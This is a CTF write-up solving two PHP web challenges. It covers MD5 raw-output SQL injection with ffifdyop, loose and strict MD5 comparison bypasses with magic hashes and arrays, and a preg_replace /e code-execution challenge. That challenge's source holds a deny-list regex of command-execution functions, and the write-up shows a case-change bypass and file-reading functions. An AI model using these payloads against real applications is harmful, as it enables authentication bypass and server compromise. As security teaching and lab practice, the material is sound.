title: 做题记录
categories:
- web
-
abbrlink: 2701
date: YYYY-MM-DD HH:mm:ss
tags:
- web
-

[BJDCTF 2020]easy_md5

image-20240429210559144

Intercepting and forwarding the request with bp (Burp Suite) reveals a hint:

image-20240429212654423

```
hint:select * from 'admin' where password=md5($pass,true)
```

The breakthrough point is how md5() is used here.

image-20240429212844829

As the documentation shows, when the raw parameter is true, md5() returns the digest as a raw 16-byte binary string instead of 32 hex characters.

If the raw MD5 bytes, read as a string, begin with 'or' followed by arbitrary characters, the SQL statement assembled by concatenation becomes:

```
select * from 'admin' where password=''or'balabala'
```

When the value after or evaluates as true, this forms a universal password and the SQL injection succeeds.

To see why, we need one MySQL quirk.

In MySQL, when a string is evaluated as a boolean, a string after or that begins with a digit is true (a leading 0 gives false, as the examples show), i.e.

```
or'digit + arbitrary characters'
e.g.
select * from `admin` where password=''or'1abcdefg' ---> True
select * from `admin` where password=''or'0abcdefg' ---> False
select * from `admin` where password=''or'1' ---> True
select * from `admin` where password=''or'2' ---> True
select * from `admin` where password=''or'0' ---> False
```

As long as the string after or begins with a digit, the condition is true; that is our breakthrough point.

The most commonly used string is ffifdyop: when raw is true, its MD5 digest begins with the bytes 'or'.

How ffifdyop works: https://www.cnblogs.com/redfish404/articles/17878453.html

So simply enter ffifdyop.
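To check the reasoning above offline, here is an added Python example (not part of the original write-up and not the challenge's code). It reproduces what the SQL layer sees when the raw digest is concatenated into the query, emulates MySQL's leading-numeric-prefix rule for strings in a boolean context, and contrasts it with the defended form: hash to hex, bind the value as a parameter instead of concatenating, and compare in constant time. The function names, the stored-password values and the assumption that only the `'<stored>' or '<tail>'` shape needs modelling are mine.

```python
"""
Added example (not from the original write-up): why md5($pass, true) pasted into
a SQL literal is exploitable, and what the defended comparison looks like.
"""
import hashlib
import hmac
import re

# MySQL takes the longest leading numeric prefix of a string when it needs a number;
# in a boolean context the string is true iff that prefix is non-zero.
_NUMERIC_PREFIX = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?")


def mysql_string_truthy(value: str) -> bool:
    """Emulate MySQL's implicit string-to-number conversion for  ... OR '<value>'."""
    m = _NUMERIC_PREFIX.match(value)
    if m is None:
        return False                  # no numeric prefix -> 0 -> false
    return float(m.group(0)) != 0.0


def md5_raw_as_sql_text(password: str) -> str:
    """What the SQL parser sees when md5($pass, true) lands inside a quoted literal.
    PHP's raw digest is a byte string; latin-1 maps every byte to exactly one char."""
    return hashlib.md5(password.encode()).digest().decode("latin-1")


def vulnerable_query(password: str) -> str:
    """The challenge's pattern: the raw digest concatenated straight into the statement."""
    return "select * from `admin` where password='" + md5_raw_as_sql_text(password) + "'"


def vulnerable_where_is_true(password: str, stored_password: str = "") -> bool:
    """Evaluate  password='' or '<tail>'  the way MySQL would.
    Assumption (mine): only the shape produced by a digest starting with 'or' is
    modelled; any other digest is simply compared against the stored value."""
    text = md5_raw_as_sql_text(password)
    if not text.startswith("'or'"):
        return text == stored_password
    tail = text[len("'or'"):]         # the literal that follows OR, up to the closing quote
    return stored_password == "" or mysql_string_truthy(tail)


def safe_check(password: str, stored_hex: str) -> bool:
    """Defended form: hex digest, never concatenated into SQL (the stored value would be
    fetched with a bound parameter), compared in constant time. MD5 is kept only to
    match the challenge; a real login should use a slow password hash."""
    return hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), stored_hex)


if __name__ == "__main__":
    print(repr(vulnerable_query("ffifdyop")))
    print(vulnerable_where_is_true("ffifdyop", stored_password="correct horse"))
```

Running it prints the assembled statement, whose literal opens with `''or'6`, and `True` even though the stored password is not known: the digit 6 that follows `'or'` is what MySQL converts to a non-zero number.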

image-20240429215117168

Viewing the page source gives:

```php
<!--
$a = $_GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    header('Location: levell14.php');
}
-->
```

This is an MD5 loose (type-juggling) comparison: when both MD5 hashes begin with 0e and consist otherwise of digits, PHP's == treats them as numeric strings that both evaluate to 0, so the comparison returns true.

Strings whose MD5 has this form, with their hashes:

```
s878926199a    0e545993274517709034328855841020
s155964671a    0e342768416822451524974117254469
s214587387a    0e848240448830537924465865611904
s1091221200a   0e940624217856561557816327384675
s1885207154a   0e509367213418206700842008763514
s1502113478a   0e861580163291561247404381396064
s1836677006a   0e481036490867661113260034900752
s1184209335a   0e072485820392773389523109082030
s1665632922a   0e731198061491163073197128363787
s532378020a    0e220463095855511507588041205815
```

Payload:

```
?a=s878926199a&b=s1665632922a
```

The response:

```php
<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}
```

This exploits the md5() strict-comparison (===) bypass.

Because md5() cannot process an array, md5() of an array returns null (with a warning); null === null holds while the two arrays themselves differ, so the condition passes.

So the payload is:

```
param1[]=1&param2[]=2
```

Reference: md5 / sha1 comparison vulnerabilities

2024 H&NCTF (Please_RCE_Me)

```php
<?php
if($_GET['moran'] === 'flag'){
    highlight_file(__FILE__);
    if(isset($_POST['task'])&&isset($_POST['flag'])){
        $str1 = $_POST['task'];
        $str2 = $_POST['flag'];
        if(preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i',$str1) || strlen($str2) != 19 || preg_match('/please_give_me_flag/',$str2)){
            die('hacker!');
        }else{
            preg_replace("/please_give_me_flag/ei",$_POST['task'],$_POST['flag']);
        }
    }
}else{
    echo "moran want a flag.</br>(?moran=flag)";
}
```

The value of flag must be 19 characters long and must still match please_give_me_flag in the replacement step. The preg_match on it in the filter has no /i flag while the preg_replace pattern does, so a case change bypasses the filter: flag=please_give_me_flaG
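The gap is a mismatch between the flags of the deny-list regex and of the consumer regex. The following is an added Python example, not code from the original write-up or the challenge: it mirrors the length and pattern checks on $flag, mirrors the /i pattern the replacement uses, and shows that making the deny check case-insensitive closes the gap. The function names are mine; the patterns are the ones in the challenge source.

```python
"""
Added example (not from the original write-up): a deny-list regex without /i in
front of a consumer regex with /i lets a case variant through.
"""
import re

REPLACE_PATTERN = re.compile(r"please_give_me_flag", re.IGNORECASE)   # mirrors /please_give_me_flag/ei
DENY_AS_WRITTEN = re.compile(r"please_give_me_flag")                  # mirrors preg_match('/please_give_me_flag/')
DENY_FIXED = re.compile(r"please_give_me_flag", re.IGNORECASE)        # same flags as the consumer


def flag_rejected(value: str, deny=DENY_AS_WRITTEN) -> bool:
    """The challenge's gate on $flag: wrong length or a deny-list match ends in 'hacker!'."""
    return len(value) != 19 or deny.search(value) is not None


def replacement_fires(value: str) -> bool:
    """Would the /ei preg_replace find a match (and so evaluate its replacement)?"""
    return REPLACE_PATTERN.search(value) is not None


def passes_filter_but_evaluates(value: str, deny=DENY_AS_WRITTEN) -> bool:
    """True when the value survives the filter yet still reaches the dangerous call."""
    return not flag_rejected(value, deny) and replacement_fires(value)


if __name__ == "__main__":
    for candidate in ("please_give_me_flag", "please_give_me_flaG"):
        print(candidate,
              passes_filter_but_evaluates(candidate),
              passes_filter_but_evaluates(candidate, DENY_FIXED))
```

With the deny check as written, `please_give_me_flaG` passes the filter and still matches the /i replacement; with the flags aligned it is rejected. The more complete fix in PHP is to drop the /e modifier (removed in PHP 7.0) in favour of preg_replace_callback, so no user-controlled string is ever evaluated.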

For task, many common command-execution functions are clearly filtered.

Here are four functions for reference:

1. readfile

image-20240514193532783

2. show_source (displays the source code or text content of the current file)

image-20240514193742880

3. highlight_file

image-20240514193934388

4. file_get_contents

image-20240514194136648

5. Encoding